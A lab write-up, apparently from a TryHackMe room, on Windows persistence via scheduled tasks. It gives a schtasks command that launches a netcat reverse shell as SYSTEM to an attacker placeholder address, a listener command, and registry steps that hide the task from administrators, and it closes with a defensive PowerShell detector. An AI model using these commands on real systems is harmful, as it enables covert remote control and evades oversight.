In this post, we cover part 4 of Windows Persistence Techniques, specifically scheduled tasks, as part of the TryHackMe Windows Local Persistence room.
The most common way to schedule tasks is using the built-in Windows task scheduler. The task scheduler allows for granular control of when your task will start, allowing you to configure tasks that will activate at specific hours, repeat periodically or even trigger when specific system events occur. From the command line, you can use `schtasks` to interact with the task scheduler. A complete reference for the command can be found on Microsoft’s website.
Understanding Scheduled Tasks for Persistence
I learned that scheduled tasks in Windows are pretty much like cron jobs in Linux. They let you run programs or scripts automatically at specific times or intervals. I can totally use this to my advantage by scheduling a payload to run regularly, essentially creating a backdoor. The key things I need to consider when making a backdoor task are:
- Payload: This is the actual code or program the task will execute. It could be anything from a PowerShell script, an executable, Python code, or even simple Windows commands.
- Date/Time: I need to set when and how often the task runs. It’s smarter to run it less frequently, like daily at startup, to avoid raising suspicion, rather than every few minutes.
- User: To get the highest privileges, I’ll definitely want the task to run as the `SYSTEM` user.
Hiding the Scheduled Task
The video emphasized that a smart system administrator auditing scheduled tasks would likely spot a suspicious new one. To avoid detection, I can hide the task. This is done by messing with its Security Descriptor (SD). Think of the SD as an access control list that decides who can see or interact with the task. By deleting the SD from the registry, I can make the task invisible to everyone, including administrators, when they check the standard Task Scheduler interface. The task will still run, but it just won’t show up in the list!
Practical Steps and Commands
Here’s a breakdown of the steps I learned and the commands I’d use:
1. Creating the Scheduled Task
I’d use the `schtasks.exe` command-line tool. For example, to create a task that runs Netcat every minute to connect back to my machine (the attacker) as the `SYSTEM` user, I’d use:

```
schtasks.exe /create /sc minute /mo 1 /tn "Test Backdoor" /tr "C:\tools\nc.exe <MY_IP_ADDRESS> <PORT> -e cmd.exe" /ru system
```

- `/create`: Tells the system I’m creating a new task.
- `/sc minute`: Sets the schedule to run every minute.
- `/mo 1`: A modifier for `/sc`, meaning “every 1 minute.”
- `/tn "Test Backdoor"`: Names my task “Test Backdoor.”
- `/tr "C:\tools\nc.exe <MY_IP_ADDRESS> <PORT> -e cmd.exe"`: This is the payload. It tells the task to run `nc.exe` from `C:\tools`, connect to my IP address on a specific port, and execute `cmd.exe` when it connects.
- `/ru system`: Ensures the task runs under the powerful `SYSTEM` account.
2. Verifying the Task (Before Hiding)
Before making it disappear, I’d check if the task was created correctly:
```
schtasks.exe /query /tn "Test Backdoor"
```
3. Setting up a Listener
On my attacker machine, I’d set up a Netcat listener to catch the connection from the victim:

```
nc -lvp <PORT>
```

- `-l`: Listen mode.
- `-v`: Verbose output.
- `-p <PORT>`: Specifies the port to listen on, matching the one in the scheduled task payload.
4. Hiding the Task via Registry
To make the task invisible, I need to delete its Security Descriptor from the Windows Registry. First, I’d open the Registry Editor with system privileges, likely using `PsExec`:

```
C:\tools\SysinternalsSuite\PsExec.exe -s -i regedit.exe
```

- `-s`: Runs the process as `SYSTEM`.
- `-i`: Runs it interactively.

Then, in `regedit.exe`, I’d navigate to:

```
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\
```

Under the `Tree` key, I’d find the subkey for my task (e.g., “Test Backdoor”) and delete the `SD` (Security Descriptor) value inside it.
5. Verifying the Task is Hidden
After deleting the SD, if I tried to query the task again using `schtasks.exe /query /tn "Test Backdoor"`, it should say the system can’t find the file. Also, opening the graphical Task Scheduler (`taskschd.msc`) wouldn’t show the task, even for an administrator. However, it’s worth noting that the task’s entry (without the SD) would still be visible in the registry path, so a very thorough administrator might still find it there.
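As an added example from the defender’s side (not part of the original post or the TryHackMe room), here is a PowerShell check for exactly the hiding trick above: it walks the `TaskCache\Tree` registry path, flags task keys whose `SD` value is missing, and cross-checks each one against what the Task Scheduler API still reports. It assumes an elevated prompt and the built-in `Get-ScheduledTask` cmdlet; the function name `Find-HiddenScheduledTask` is my own.

```powershell
function Find-HiddenScheduledTask {
    # Registry path the post describes, in both PS-drive and raw key-name form
    $treeKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree'
    $prefix  = 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree'

    # Task paths the Task Scheduler API is still willing to show (\Folder\Name form)
    $visible = @{}
    Get-ScheduledTask | ForEach-Object { $visible[$_.TaskPath + $_.TaskName] = $true }

    # Walk every key under Tree; task folders are nested keys, so recurse
    Get-ChildItem -Path $treeKey -Recurse | ForEach-Object {
        $props = Get-ItemProperty -Path $_.PSPath
        # Task keys carry an Id (GUID) value; pure folder keys do not, so skip those
        if (-not $props.PSObject.Properties['Id']) { return }

        $taskPath = $_.Name.Substring($prefix.Length)          # e.g. "\Test Backdoor"
        $hasSd    = [bool]$props.PSObject.Properties['SD']     # $false once SD was deleted

        [pscustomobject]@{
            TaskPath     = $taskPath
            HasSD        = $hasSd
            VisibleToApi = $visible.ContainsKey($taskPath)
            Id           = $props.Id
        }
    } | Where-Object { -not $_.HasSD -or -not $_.VisibleToApi }   # keep only the suspicious ones
}

# Print anything the registry knows about but the Task Scheduler UI/API would not show
Find-HiddenScheduledTask | Format-Table -AutoSize
```

A task with `HasSD = False` and `VisibleToApi = False` is the signature this post’s hiding step leaves behind; the `Id` column lets you pivot to the matching `TaskCache\Tasks\{GUID}` key for the task’s details.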
Room Answers
Video Walk-through